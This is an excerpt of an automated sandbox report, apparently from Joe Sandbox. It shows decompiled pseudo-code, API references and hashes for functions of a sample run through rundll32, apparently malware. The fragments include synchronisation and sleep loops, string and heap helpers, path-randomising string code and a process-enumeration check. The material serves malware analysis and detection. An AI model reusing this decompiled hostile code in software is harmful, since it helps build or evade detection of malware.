                                          Function 0408A1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E0408A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x408d140; // 0x408ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E040858BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0408147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04089D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x0408a1f1
                                          0x0408a1f1
                                          0x0408a1fb
                                          0x0408a201
                                          0x0408a204
                                          0x0408a208
                                          0x0408a20e
                                          0x0408a213
                                          0x0408a22c
                                          0x0408a22f
                                          0x0408a233
                                          0x0408a237
                                          0x0408a238
                                          0x0408a23d
                                          0x0408a240
                                          0x0408a247
                                          0x0408a24e
                                          0x0408a2a1
                                          0x0408a2a7
                                          0x0408a2ad
                                          0x0408a2e8
                                          0x0408a2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408a2ad
                                          0x0408a254
                                          0x00000000
                                          0x0408a25b
                                          0x0408a269
                                          0x0408a26c
                                          0x0408a26f
                                          0x0408a27b
                                          0x0408a27f
                                          0x0408a2e1
                                          0x0408a281
                                          0x0408a284
                                          0x0408a288
                                          0x0408a289
                                          0x0408a28a
                                          0x0408a28c
                                          0x0408a293
                                          0x0408a2d1
                                          0x0408a2dc
                                          0x0408a295
                                          0x0408a298
                                          0x0408a29c
                                          0x0408a29c
                                          0x0408a293
                                          0x00000000
                                          0x0408a27f
                                          0x0408a254
                                          0x0408a218
                                          0x0408a21e
                                          0x0408a221
                                          0x0408a226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408a2b6
                                          0x0408a2be
                                          0x0408a2c3
                                          0x0408a2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0408A208
                                          • SetEvent.KERNEL32(?), ref: 0408A218
                                          • GetLastError.KERNEL32 ref: 0408A2A1
                                            • Part of subcall function 04089D3A: WaitForMultipleObjects.KERNEL32(00000002,0408AA33,00000000,0408AA33,?,?,?,0408AA33,0000EA60), ref: 04089D55
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • GetLastError.KERNEL32(00000000), ref: 0408A2D6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 5be725225b17f60a6b61aee26584cc1e573bef2d0ca11a5f711d7e4350dffff9
                                          • Instruction ID: 59f59edd17a6316d463436d5f336417ac4b33791f11c4a7e9163327165c400fc
                                          • Opcode Fuzzy Hash: 5be725225b17f60a6b61aee26584cc1e573bef2d0ca11a5f711d7e4350dffff9
                                          • Instruction Fuzzy Hash: 43311EB5B00209EFDB30EFE9CA8499EB7F8EF08344F10496ED582B2541D735AA459F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040854AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E040854AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04084F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04085749(_t23);
						}
					}
					return _t38;
				}
				if(E04089138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x408d2a8, 1, 0,  *0x408d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04089575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0408A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E0408568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E040872F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x040854ac
                                          0x040854b9
                                          0x040854bf
                                          0x040854c0
                                          0x040854c1
                                          0x040854c2
                                          0x040854c3
                                          0x040854c7
                                          0x040854d3
                                          0x040854d7
                                          0x0408555f
                                          0x0408555f
                                          0x04085562
                                          0x04085564
                                          0x0408556c
                                          0x04085572
                                          0x04085575
                                          0x04085575
                                          0x04085572
                                          0x04085580
                                          0x04085580
                                          0x040854ea
                                          0x040854ec
                                          0x040854ec
                                          0x04085503
                                          0x04085507
                                          0x0408550a
                                          0x04085515
                                          0x0408551c
                                          0x0408551c
                                          0x04085525
                                          0x04085529
                                          0x04085537
                                          0x0408552b
                                          0x0408552b
                                          0x0408552c
                                          0x0408552d
                                          0x0408552e
                                          0x0408552f
                                          0x04085530
                                          0x04085530
                                          0x0408553c
                                          0x0408553f
                                          0x04085543
                                          0x04085545
                                          0x04085545
                                          0x0408554c
                                          0x00000000
                                          0x0408554e
                                          0x0408554e
                                          0x0408555b
                                          0x00000000
                                          0x0408555b

                                          APIs
                                          • CreateEventA.KERNEL32(0408D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 040854FD
                                          • SetEvent.KERNEL32(00000000), ref: 0408550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04085515
                                          • CloseHandle.KERNEL32(00000000), ref: 0408551C
                                            • Part of subcall function 04089575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0408553C,?,0408553C,?,?,?,?,?,0408553C,?), ref: 0408964F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 5674017c357b865f1865b78ff57c7d661ed76472863ad6585f704bcdd849da82
                                          • Instruction ID: 21fa9498928cdd59de03c7cf078a7bca1eec7ab7e13f015ca0c2ceeb497f8db9
                                          • Opcode Fuzzy Hash: 5674017c357b865f1865b78ff57c7d661ed76472863ad6585f704bcdd849da82
                                          • Instruction Fuzzy Hash: F7214572D00115BBDF10BFE4DE949EE77BAEF48358B05442DEAD2B7100E678B9418B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04084858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04084858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x408d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x408d250; // 0xa5d54544
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x408d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x04084860
                                          0x04084863
                                          0x04084869
                                          0x04084881
                                          0x04084883
                                          0x04084888
                                          0x0408488a
                                          0x0408488d
                                          0x0408488f
                                          0x04084892
                                          0x04084894
                                          0x04084894
                                          0x04084896
                                          0x040848a1
                                          0x040848a6
                                          0x040848b7
                                          0x040848bf
                                          0x040848c4
                                          0x040848c7
                                          0x040848ca
                                          0x040848cc
                                          0x040848cf
                                          0x040848d2
                                          0x040848d2
                                          0x040848d5
                                          0x040848e0
                                          0x040848e5
                                          0x040848ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04084DBF,00000000,?,?,040852FE,?,04C895B0), ref: 04084863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0408487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04084DBF,00000000,?,?,040852FE,?,04C895B0), ref: 040848BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 040848E0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 515623b6b73030b1635d682d6dac460e8f3533dc2c885cd75fc61d7395270d76
                                          • Instruction ID: 9eb6cb6f79c054759a2d4ea011043336ef3c75677fd3e2acd83ce571fec0b7f8
                                          • Opcode Fuzzy Hash: 515623b6b73030b1635d682d6dac460e8f3533dc2c885cd75fc61d7395270d76
                                          • Instruction Fuzzy Hash: 1711C672A00159EFD714DE69DE84D9EBFFEDF90260B45027AF944AB290E7789E00C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04086AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E04086AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04086F89(_t8, _t1);
				_t16 = E040858BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04089038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E040858BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E0408147E(_t16);
				}
				return _t18;
			}









                                          0x04086b02
                                          0x04086b03
                                          0x04086b06
                                          0x04086b08
                                          0x04086b13
                                          0x04086b17
                                          0x04086b1c
                                          0x04086b20
                                          0x04086b28
                                          0x04086b2d
                                          0x04086b35
                                          0x04086b35
                                          0x04086b3e
                                          0x04086b42
                                          0x04086b48
                                          0x04086b4b
                                          0x04086b51
                                          0x04086b51
                                          0x04086b59
                                          0x04086b59
                                          0x04086b60
                                          0x04086b60
                                          0x04086b6b

                                          APIs
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                            • Part of subcall function 04089038: wsprintfA.USER32 ref: 04089094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04082098,74666F53,00000000,?,0408D00C,?,?), ref: 04086B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04086B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 70cad3aac9dabc0012744550a1c4619fc997f5dde33547a99e7fa83c5362e7ee
                                          • Instruction ID: fc5f8bc69477936dc835b5cc7c5a15dbb78b62e48cb17b02e5b5f3cdd1767142
                                          • Opcode Fuzzy Hash: 70cad3aac9dabc0012744550a1c4619fc997f5dde33547a99e7fa83c5362e7ee
                                          • Instruction Fuzzy Hash: A801AC321001057BE7123AA49E48DEE3AACDF8439DF054529F9857A101D739D5458BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040856A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E040856A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x408d2a4; // 0xbfa5a8
						_t2 = _t9 + 0x408ee38; // 0x73617661
						_push( &_v264);
						if( *0x408d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x040856ad
                                          0x040856b7
                                          0x040856bb
                                          0x040856c5
                                          0x040856f6
                                          0x040856cc
                                          0x040856d1
                                          0x040856de
                                          0x040856e7
                                          0x040856fe
                                          0x040856e9
                                          0x040856f1
                                          0x00000000
                                          0x040856f1
                                          0x040856ff
                                          0x04085700
                                          0x00000000
                                          0x04085700
                                          0x00000000
                                          0x040856fa
                                          0x04085706
                                          0x0408570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 040856B2
                                          • Process32First.KERNEL32(00000000,?), ref: 040856C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 040856F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04085700
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: e9299cb41d246e50c93ec6bd3fed313347fab1cbbc77ecbf7318c082b454e672
                                          • Instruction ID: 32791d4ef9e0ea6c4fbb1d8f98172f7510ea04f1695dbcaefaf95f32565410c6
                                          • Opcode Fuzzy Hash: e9299cb41d246e50c93ec6bd3fed313347fab1cbbc77ecbf7318c082b454e672
                                          • Instruction Fuzzy Hash: 7FF0F672601124AAF720BA36AF08EDF76ACDF85344F000169E9C5F3080EA64E9568AA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0051179C, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0051179C() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x514130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x51413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x51412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x514128 = _t5;
						 *0x514130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x514124 = _t6;
						if(_t6 == 0) {
							 *0x514124 =  *0x514124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                          0x0051179d
                                          0x005117ab
                                          0x005117b1
                                          0x005117b8
                                          0x0051180f
                                          0x0051180f
                                          0x005117ba
                                          0x005117c2
                                          0x005117cf
                                          0x005117cf
                                          0x0051180b
                                          0x0051180d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005117c4
                                          0x005117cb
                                          0x005117d1
                                          0x005117d1
                                          0x005117d6
                                          0x005117e4
                                          0x005117e9
                                          0x005117ef
                                          0x005117f5
                                          0x005117fc
                                          0x005117fe
                                          0x005117fe
                                          0x00511808
                                          0x005117cd
                                          0x005117cd
                                          0x00000000
                                          0x005117cd
                                          0x005117cb

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005111E0), ref: 005117AB
                                          • GetVersion.KERNEL32(?,005111E0), ref: 005117BA
                                          • GetCurrentProcessId.KERNEL32(?,005111E0), ref: 005117D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005111E0), ref: 005117EF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: bec84d0f1c442d538b5244d6b6ccb5a775bfa16277e448cf2a17bdff447794bd
                                          • Instruction ID: 9863ed0e3e2d186267e05a81e302c55babce95977dddf5f8a9a7c6bb4dfe5842
                                          • Opcode Fuzzy Hash: bec84d0f1c442d538b5244d6b6ccb5a775bfa16277e448cf2a17bdff447794bd
                                          • Instruction Fuzzy Hash: BFF06D71980611BBEB109B69BC19BD43FA0A729722F20C166E641C61E4E36085C9EF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04087283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04087283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x0408728d
                                          0x04087291
                                          0x040872a6
                                          0x040872a8
                                          0x040872ad
                                          0x040872b3
                                          0x040872b5
                                          0x040872ba
                                          0x040872c5
                                          0x040872bc
                                          0x040872bc
                                          0x040872bc
                                          0x040872ba
                                          0x040872d3

                                          APIs
                                          • memset.NTDLL ref: 04087291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 040872A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 040872B3
                                          • CloseHandle.KERNEL32(?), ref: 040872C5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 8ec190c09cd39fc6197e046101d2bea487173a89788e86e4ffeb62342c9cc042
                                          • Instruction ID: 0e39cfd5e148bf58316dc6bd46a9f3793287939dc390d969645c2d0a20e912b7
                                          • Opcode Fuzzy Hash: 8ec190c09cd39fc6197e046101d2bea487173a89788e86e4ffeb62342c9cc042
                                          • Instruction Fuzzy Hash: 26F0FEB1104308BFE310BF66DDC4C2BBBECEB9529CB21892EF582A2511D676A9154E71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0408A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E040858BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x0408a2f2
                                          0x0408a2f6
                                          0x0408a2f8
                                          0x0408a2fe
                                          0x0408a302
                                          0x0408a304
                                          0x0408a304
                                          0x0408a306
                                          0x0408a30f
                                          0x0408a313
                                          0x0408a31b
                                          0x0408a32a
                                          0x0408a32f
                                          0x0408a337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04089AA8,00000000,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0408A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 0408A31B
                                          • memset.NTDLL ref: 0408A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 9e4700ce08f9990edf51a3dc8748df282c42f48ba2889f8c16a4614c85ff9c0f
                                          • Instruction ID: f89ab952cb51dedd53a6833c6bcb7d2ac72c6dfcc328a00878a7da94031eb4c1
                                          • Opcode Fuzzy Hash: 9e4700ce08f9990edf51a3dc8748df282c42f48ba2889f8c16a4614c85ff9c0f
                                          • Instruction Fuzzy Hash: 1FE0E573A053156BD730B9B85E88D8F2AECDBD4264B00083AFD85B7204E630DC148AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04084C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E04084C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x408d324; // 0x4c895b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x408d324; // 0x4c895b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x408d030) {
					HeapFree( *0x408d238, 0, _t8);
				}
				_t14[1] = E04087C75(_v0, _t14);
				_t11 =  *0x408d324; // 0x4c895b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x04084c3a
                                          0x04084c3a
                                          0x04084c43
                                          0x04084c53
                                          0x04084c53
                                          0x04084c58
                                          0x04084c5d
                                          0x00000000
                                          0x00000000
                                          0x04084c4d
                                          0x04084c4d
                                          0x04084c5f
                                          0x04084c63
                                          0x04084c75
                                          0x04084c75
                                          0x04084c85
                                          0x04084c88
                                          0x04084c8d
                                          0x04084c91
                                          0x04084c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04084C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04084C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04084C75
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 04084C91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 3fd8c133c0e851fededcac71da1685cff8d349504232080afbdd71bd9968f2a2
